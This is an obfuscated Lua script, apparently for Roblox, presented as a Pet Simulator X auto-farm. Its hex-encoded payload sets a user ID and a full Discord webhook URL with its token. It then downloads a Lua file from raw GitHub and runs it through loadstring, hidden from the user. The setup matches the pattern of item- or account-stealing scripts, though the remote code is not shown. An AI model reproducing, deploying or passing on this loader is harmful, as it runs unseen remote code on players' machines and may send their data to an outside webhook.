--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((1770 -(189 + 19 + 1560))^(v32-1)))%(2^(((v33-((1152 -(527 + 246)) -(167 + 211))) -(v32-((530 + 963) -(1116 + 376)))) + (1 -0)));return v76-(v76%(31 -(13 + 17)));else local v77=2^(v32-(1 -0));return (((v31%(v77 + v77))>=v77) and (1 -0)) or (0 + 0 + 0);end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + 2 + 0);v18=v18 + 2;return (v40 * (682 -(359 + 67))) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (3 -0));v18=v18 + ((1 + 7) -4);return (v44 * (9136064 + 7641152)) + (v43 * (65648 -(40 + 72))) + (v42 * ((839 -(339 + 283)) + 39)) + v41;end local function v24()local v45=v23();local v46=v23();local v47=1 + 0 + 0;local v48=(v20(v46,(2 -1) + 0,1505 -(493 + 992)) * (((470 + 99) -(116 + 451))^(8 + 24))) + v45;local v49=v20(v46,82 -61,117 -86);local v50=((v20(v46,10 + 22)==(868 -(727 + 140))) and  -(1 + 0)) or (1 + 0);if (v49==(365 -(90 + 275))) then if (v48==(0 -0)) then return v50 * (0 -0);else v49=2 -(2 -1);v47=(107 + 59) -(132 + 34);end elseif (v49==(1288 + 759)) then return ((v48==(0 -0)) and (v50 * (((4109 -2171) -(1857 + 80))/(0 -0)))) or (v50 * NaN);end return v8(v50,v49-(2772 -(42 + 1707))) * (v47 + (v48/((2 + 0)^(88 -36))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v34) -(3 -2));v18=v18 + v34;local v52={};for v63=1, #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=1868 -(1849 + 18),v57 do local v66=v21();local v67;if (v66==(948 -(338 + 609))) then v67=v21()~=0;elseif (v66==2) then v67=v24();elseif (v66~=(1 + 2)) then else v67=v25();end v58[v65]=v67;end v56[5 -2]=v21();for v69=1 + 0,v23() do local v70=v21();if (v20(v70,1 + 0,1)==0) then local v83=v20(v70,2,3);local v84=v20(v70,1627 -(95 + 1528),6 + 0);local v85={v22(),v22(),nil,nil};if (v83==0) then v85[6 -3]=v22();v85[4]=v22();elseif (v83==1) then v85[3]=v23();elseif (v83==2) then v85[1870 -(815 + 1052)]=v23() -(2^16);elseif (v83==(3 + 0)) then v85[2 + 1]=v23() -((4 -2)^(8 + 8));v85[4]=v22();end if (v20(v84,1,1 -0)==(1083 -(508 + 574))) then v85[7 -5]=v58[v85[6 -4]];end if (v20(v84,2,2 + 0)~=1) then else v85[3]=v58[v85[657 -(235 + 419)]];end if (v20(v84,3,1878 -(1787 + 88))~=(1 + 0)) then else v85[1007 -(757 + 246)]=v58[v85[11 -7]];end v53[v69]=v85;end end for v71=1,v23() do v54[v71-(2 -1)]=v28();end for v73=1,v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=0 + 0,v81 do if ((v107>=v90) or ((478 + 4435)<(5574 -(172 + 1673)))) then v92[v107-v90]=v80[v107 + (2 -1)];else v94[v107]=v80[v107 + (644 -(91 + 552)) + 0];end end local v95=(v81-v90) + (1787 -((812 -(637 + 110)) + (2994 -(450 + 823))));local v96;local v97;while true do v96=v88[v78];v97=v96[1824 -(1502 + 321)];if ((v97<=(1150 -(676 + 471))) or ((7470 -3830)<((3918 -(1360 + 89)) -(931 + 480 + 459)))) then if ((v97<=(1 -(1132 -(245 + 887)))) or ((1121 -749)>=((2527 -1491) + (967 -752)))) then if (((4998 -(526 + 1116))>(2700 -(470 + 178))) and (v97==(0 -(500 -(235 + 265))))) then v94[v96[579 -(20 + 557)]][v96[4 -1]]=v96[981 -(290 + 687)];else local v120=v96[1 + 0 + 1];local v121=v94[v96[602 -(8 + (2341 -(1728 + 22)))]];v94[v120 + 1 + 0]=v121;v94[v120]=v121[v96[297 -(47 + 227 + 19)]];end elseif (((22 + 27 + 3)<=(1116 + (2231 -(45 + 61)))) and (v97>(866 -(62 + 229 + 454 + 119)))) then local v125=v96[(1969 -(154 + 410)) -(1352 + 51)];v94[v125]=v94[v125](v13(v94,v125 + 1,v79));else local v127=v96[2 + 0];local v128,v129=v91(v94[v127](v13(v94,v127 + 1,v96[12 -9])));v79=(v129 + v127) -(1 + (382 -(30 + 352)));local v130=1693 -(785 + 447 + 461);for v135=v127,v79 do v130=v130 + (1 -0);v94[v135]=v128[v130];end end elseif ((v97<=(305 -(143 + 157))) or (((5570 -2539) + 244)==(3390 -986))) then if ((v97>(10 -6)) or (3502<(1117 -(13 + 57 + 883)))) then v94[v96[2 + 0]]=v96[3];else v94[v96[1558 -(52 + (2856 -1352))]]();end elseif ((v97==(20 -14)) or (((14019 -8443) -(32 + 565))<=4295)) then do return;end else v94[v96[4 -2]]=v37[v96[4 -1]];end v78=v78 + 1 + 0;end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703063O00557365724944022O0060B86593EE4103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O36373831372O363436393239323039322F6631326677534C41324B765768576C3431753967566E4E7876596D4C4D732O6C32704148614D4C614F545F6B596A70346E445435746644522O7A734E3136623239566D49030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C7561000C3O0012073O00013O00304O000200030012073O00013O00304O000400050012073O00063O001207000100073O002001000100010008001205000300094O0002000100034O00035O00022O00043O000100012O00063O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
